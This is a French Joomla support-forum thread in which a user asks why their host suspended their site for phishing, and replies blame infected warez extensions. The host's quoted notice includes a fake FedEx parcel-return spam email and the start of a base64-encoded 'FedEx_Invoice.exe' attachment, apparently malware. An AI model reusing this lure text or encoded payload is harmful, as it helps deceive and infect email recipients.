fishing

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • fishing

    Envoyé par SimonG Voir le message
    Et sinon, tu peux essayer de créer ton template avec un outil comme CK creator. Il existe une version d'essai gratuite.
    Bonjour, j'ai installé Joomla 2.5 et dans l'heure qui a suit j'ai eu mon domain bloqué par l'ebergeur pour caus de fishing (quelque chose avec les poissons??? ) :





    De : Support PHPNET <support@phpnet.org>
    À : et_emilian@yahoo.fr; support@phpnet.org
    Envoyé le : Mardi 21 février 2012 10h36
    Objet : [PHPNET] Problème de phishing sur votre hébergement


    Madame, Monsieur,

    Nous vous informons qu'un problème se pose avec l'hébergement de votre domaine far-dream.fr.
    Votre compte d'hébergement semble héberger un site de Phishing (copie d'un site officiel de banque ou
    d'organisme financier) que des pirates exploitent afin de voler du numéros de carte bancaire.
    L'un de vos scripts PHP semble donc contenir une faille de securité que des pirates exploitent.

    Afin de ne pas faire blacklister nos serveurs, nous sommes dans l'obligation de couper votre site
    tant que les modifications n'ont pas été effectuées dans vos scripts afin de les sécuriser.

    Votre site est donc coupé à partir de cette minute.

    Voici l'URL responsable du phishing :
    ------

    Received: from unknown (HELO mutu.phpnet.org) (195.144.11.40)
    by mailfilter.phpnet.org with SMTP; 17 Feb 2012 01:21:50 -0000
    Received: (qmail 13246 invoked by uid 17445); 17 Feb 2012 01:21:50 -0000
    Date: 17 Feb 2012 01:21:50 -0000
    Message-ID: <20120217012150.13245.qmail@mutu.phpnet.org>
    To: eliruiz10@hotmail.com
    ScriptPath: www.far-dream.fr/3cb2.php
    Subject: Track your parcel
    From: "FedEx Service" <personal.information@fedex.com>
    X-Mailer: AOL9.0forWindowsUSsub541
    Reply-To: "FedEx Service" <personal.information@fedex.com>
    Mime-Version: 1.0
    Content-Type:multipart/mixed;boundary="----------13294417104F3DABAE84506"

    ------------13294417104F3DABAE84506
    Content-Type:text/html;
    Content-Transfer-Encoding: 8bit

    Hello, <BR>
    <BR>
    Your package has been returned to the FedEx office. <BR>
    The reason of the return is - Error in the delivery address. <BR>
    Please print out the invoice copy attached and collect the package at our office. <BR>
    <BR>
    FedEx Global Mail. <BR>

    ------------13294417104F3DABAE84506
    Content-Type: application/octet-stream;name="FedEx_Invoice.zip"
    Content-Transfer-Encoding:base64
    Content-Disposition:attachment;filename="FedEx_Invoice.zip "

    UEsDBBQAAAAIAAeCUEBKw8QdQ34EAADQBAARABwARmVkRXhfSW 52b2ljZS5leGVVVAkAA067PE9N^M
    uzxPdXgLAAEE6AMAAAToAwAA7JcHWFPZtoBPCF2qBAjCYBALTV SwUAXUgCIRRCNKU5pIFJAqojSj^M
    SAhNVISRNjpYUEQEaY5KESmCVBWkq0AgICAdgdxzEnVknPdmf8 68712/ew8m6+x1/r32WnutvU4k^M
    mEdBaAiC2OEPgwFBuRDr0oX++qqBPwKL8wWgLJ4qmVyUUZXM7k NOHrij7q6O7jbOODsbFxdXT5yt^M
    A87dywXn5ILbYrwL5+xq76DMz8+79PM6qnaz7Kb8dz5/5twwd3iY93x3xJCxt9AdDqbc+kmuZkpT^M
    J7tDCP9Hn0zwEGSE4oZ45LWNP+s6IEHUAhQXBGmhoMIQNFM3JA J/CSETUKxokXs21j5A0O8S6ljA^M
    HJQv4EAesyYJfS2/COZ1ALYXhtxEoaBrZDTALgJesN0D/8tjZU8HH09YSmugWA7Bsf4eBOvCwe4p^M
    u9vbeNpAUAUbyyaT0UXN43Thf8osDFqLKA7Mf/4VV6Bs6+GB3EsjX0dRzD2Etnxjr0DZm2WQyQV+^M
    4vT/hHP3cLeD76/J8jL3EDoN7+HWP/HPw5vlIGKnYAFLVrJ/a8/H8Xeu5hP3/FvuTwP8D7iI1H5y^M
    Px+FOEohTFLxoxT8DBWPQeP50PBNl1XRaqhy/sXkjSiErFJ8JTK/FF/GErks0cAST1hiiCUmWaKF^M
    JTpY4h1L0FiihiVGWeI3luhniQKWaGSJGUSQ/SYhT06GKMZED+EusAzrsiyu5UdEpQYL/yWGDQ27^M

    ------
    Bien cordialement,

    L'Equipe PHPNET


    C'est quoi un fishing? Est qu'on peut bloquer les pirates? (j'endoute fort)
    Merci

  • #2
    Re : Joomla 1.5, 1.7 et maintenant 2.5 lequel ?

    Bonsoir,

    Du phishing est un script injecté pour servir de passerelle pour plumer les pigeons par mail via leur compte bancaire. Normal donc que l'hébergeur est bloqué ton nom de domaine.

    Le pack Joomla 2.5.1-fr est sain, donc cela ne vient pas de là, maintenant si tu as installé un pack Joomla/extensions/Template issus d'un warez faut pas s'étonner. Ou alors tu avais déjà un site installé et celui-ci a été vérolé.

    Si pas ces deux cas, je ne vois qu'une machine contaminé.

    Est qu'on peut bloquer les pirates? (j'endoute fort)
    Oui par l'intermédiaire d'extensions dédiées à cela (voir le forum sécurité), mais ne peut ce faire que sur un site exempt de tous reproches.

    Commentaire


    • #3
      Re : fishing

      Je rejoins zepelin. Ce n'est pas Joomla qui est en cause mais ce que tu as installé sur ton Joomla et la provenance de ce que tu as installé. Si c'est du warez, faut pas chercher plus loin. Si ce n'est pas du warez, faudrait peut-être contacté le site où tu t'es procuré le truc vérolé pour le leur signaler.
      Christophe (cavo789)
      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

      Commentaire

      Annonce

      Réduire
      Aucune annonce pour le moment.

      Partenaire de l'association

      Réduire

      Hébergeur Web PlanetHoster
      Travaille ...
      X